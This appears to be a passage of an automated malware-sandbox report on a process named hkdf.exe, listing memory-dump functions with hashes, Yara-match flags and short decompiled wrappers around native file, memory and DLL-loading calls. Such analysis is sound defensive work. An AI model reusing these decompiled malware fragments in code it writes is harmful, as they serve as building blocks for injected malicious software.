Opcode Fuzzy Hash: cc8cbb58f8c9bc67f13ef9ac07751539d393445edb423ba71cf1e4d76dccfe49
Instruction Fuzzy Hash: F0D0A7313593545FC3005A7DA4155563FD98EC751474100E7E684C7632DAA29C1287C1

Uniqueness

Uniqueness Score: -1.00%

Function 00491536, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243badd56d2c2c9da95d3d79af02f7ef24e0884a19bfcc2eff0f7715b8438fc8
Instruction ID: 8c71772948a72d36bd9a114e88568a40d4d1f73753b2a8f3ceb7f9152d881cba
Opcode Fuzzy Hash: 243badd56d2c2c9da95d3d79af02f7ef24e0884a19bfcc2eff0f7715b8438fc8
Instruction Fuzzy Hash: 0FD0A73092A305CFCB14DA60D94185CBAB2AFC5314F20167B900185220D33CCD52CA06

Uniqueness

Uniqueness Score: -1.00%

Function 0049198C, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd20be0510cbb89d6c7e02a61ae85b1cba084fa739e7193b99e7395bfb74d482
Instruction ID: 3bb435fbfbd27628ca324cc4355ed5a7f152baad645118681ffbf8cdba0b7eae
Opcode Fuzzy Hash: fd20be0510cbb89d6c7e02a61ae85b1cba084fa739e7193b99e7395bfb74d482
Instruction Fuzzy Hash: 9ED04274D052699FCB54CFA5D98869DBAF2AB89200F20E4A79519B6214DB344A418F10

Uniqueness

Uniqueness Score: -1.00%

Function 0049132B, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8c08028bca86640f4ee10b7aa7ee1c91ee6e3312ccfba3a0515607caa556951
Instruction ID: d2ed1e7cc56d8d068a6830dd856a7802431680f40992022aef88a2cf81e74d90
Opcode Fuzzy Hash: a8c08028bca86640f4ee10b7aa7ee1c91ee6e3312ccfba3a0515607caa556951
Instruction Fuzzy Hash: A2D0C93494A3189BCB04CBB0D29019DBEB3AF96214F24A8AED18576254D3749952CB54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B927F3, Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

.@l, xrefs: 00B9294B
@23m, xrefs: 00B929FD

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID:
String ID: .@l$@23m
API String ID: 0-3133727039
Opcode ID: 13eef823b9ad341683d6c233c3b731a318b50cfa2a043c622e80a0b663557b20
Instruction ID: 91975fbcf7ab7fa95841c627468dfa0cb40d63c64755c1ffa4a22f807286ee33
Opcode Fuzzy Hash: 13eef823b9ad341683d6c233c3b731a318b50cfa2a043c622e80a0b663557b20
Instruction Fuzzy Hash: 6F517B749016098FDB45EFBAE844A9EBBF2EF84308F10C979E0149B368DB345945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B92800, Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

.@l, xrefs: 00B9294B
@23m, xrefs: 00B929FD

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID:
String ID: .@l$@23m
API String ID: 0-3133727039
Opcode ID: a88270e45637d57bbe9512a5319efee15d9f909633efca235b610d4c4779d7c5
Instruction ID: afa87c41b24f01cd19d1b8df7392f11c465beb524765b85962861694f71b4192
Opcode Fuzzy Hash: a88270e45637d57bbe9512a5319efee15d9f909633efca235b610d4c4779d7c5
Instruction Fuzzy Hash: 42518C749016098FDB45EFBAE845A9EBBF2EF84308F10C979E0149B368EB745945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B93552, Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

~, xrefs: 00B93714
UUUU, xrefs: 00B93629

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID:
String ID: UUUU$~
API String ID: 0-3447969290
Opcode ID: 3d181b48ef06249088c7dda955b632e2345481d4234714f113d456fcadef4f5c
Instruction ID: 8c3f662cb95e96327a43c16dd3c95d22a4efbedd273173c1f8a4ce2547f75366
Opcode Fuzzy Hash: 3d181b48ef06249088c7dda955b632e2345481d4234714f113d456fcadef4f5c
Instruction Fuzzy Hash: D2513870E156288BEBA4CF69CD84B8DB7F2BB49204F1482E9D15CE7205DB34AE858F14

Uniqueness

Uniqueness Score: -1.00%

Function 004900BC, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be915c1807a4bd6c231116475a47ba196741b3fe841df374456d553e6ec679d5
Instruction ID: 7880c4209f6e3e7a7abb93ec49c1f9d67397315b3c668e8b276e2b6c2995fc0f
Opcode Fuzzy Hash: be915c1807a4bd6c231116475a47ba196741b3fe841df374456d553e6ec679d5
Instruction Fuzzy Hash: 30112375E016189BEB08CFABD84079EBAF3AFC8311F14C4BAD408A6224DB345A458E51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hkdf.exe PID: 2832 Parent PID: 3004 hkdf.exeCOMMON

Executed Functions

Function 00396F06, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 482nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0039706F

Strings

0, xrefs: 003970F7

Memory Dump Source

Source File: 00000006.00000002.461702254.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
Instruction ID: 454fd8a901045242b4abcd97b870ad4b3b2e39e76d6cddfbefc1c72ed9efbd45
Opcode Fuzzy Hash: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
Instruction Fuzzy Hash: 38F12F70518A8C8FDF6AEF68C895AEEB7E0FB98304F40462EE44ADB251DF349541CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00396F12, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0039706F

Strings

0, xrefs: 00396F9D

Memory Dump Source

Source File: 00000006.00000002.461702254.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
Instruction ID: 943da5fc208b45407dcdb22e04f89c420591a9ff092957144ec84836b9f5169a
Opcode Fuzzy Hash: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
Instruction Fuzzy Hash: 69513C70918A8C8FDB69EF69C8846EEBBF4FB98304F40462ED44AD7251DF309645CB41

Uniqueness

Uniqueness Score: -1.00%

Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}

0x004186a3
0x004186af
0x004186b7
0x004186bc
0x004186e5
0x004186e9

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5

Strings

A:A, xrefs: 004186BC, 004186C8

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AF90(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3B0(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B630( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b59
0x00409b6c
0x00409b6f
0x00409b74
0x00409b79
0x00409b83
0x00409b88
0x00409b8b
0x00409b8d
0x00409b95
0x00409b9a
0x00409b9a
0x00409ba1
0x00409ba9
0x00409bac
0x00409bae
0x00409bc2
0x00000000
0x00409bc4
0x00409bca
0x00409b7e
0x00409b7e
0x00409b7e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: afa3cb2b82f763e4c143b2584a44dcb3567b2da14c64915af70a02bec35298af
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: 1B0152B5D0020DABDB10DAA1DD42FDEB378AB54308F0041AAE918A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ff
0x00418607
0x0041863d
0x00418641

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041871B, Relevance: 1.5, APIs: 1, Instructions: 36
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041871B(void* __eax) {
				void* _t9;

				_t9 = __eax - 0x64;
				if (_t9 >= 0) goto L3;
			}

0x0041871c
0x0041871f

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 019559e28e819c332f0fa6751d76b624541799575efc25ba78e5d454cb21a0f3
Instruction ID: 1a7bf28cb93605af0575d2404096902759242a85c9d761b7fb13c20f2f2bd64d
Opcode Fuzzy Hash: 019559e28e819c332f0fa6751d76b624541799575efc25ba78e5d454cb21a0f3
Instruction Fuzzy Hash: 8FF05E76200214BBDB10EF98DC84EE773A9EF88310F108559FA589B241C630E9558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 34
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004187CA(void* __eax, void* __ebx, void* __esi, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t21;
				void* _t30;

				asm("int 0xa0");
				_push(_t35);
				_t17 = _v0;
				_t6 = _t17 + 0xc60; // 0xca0
				E004191F0(_t30, _v0, _t6,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t21 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t21;
			}

0x004187cb
0x004187d0
0x004187d3
0x004187df
0x004187e7
0x00418809
0x0041880d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b55d21cff14d87af7e0b96c17aa69314a2174ca35f49e019e68a5d5d41985fe2
Instruction ID: 3126bc74c659fe6be297dc88e4ae943ca80ad581e737688e522ceb483803305c
Opcode Fuzzy Hash: b55d21cff14d87af7e0b96c17aa69314a2174ca35f49e019e68a5d5d41985fe2
Instruction Fuzzy Hash: A3F0FEB12502197FDB14DF89CC81EAB77ADBF88654F114159FE1897282C630E811CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187df
0x004187e7
0x00418809
0x0041880d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 009B00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009B00CF

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 009B0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009B0053

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 009B0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009B0086

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 009B07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009B07B7

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 009AF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AF9FB

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 009AF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AF90E

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 009AFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFADB

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 009AFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFAF3

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 009AFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFBC3

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
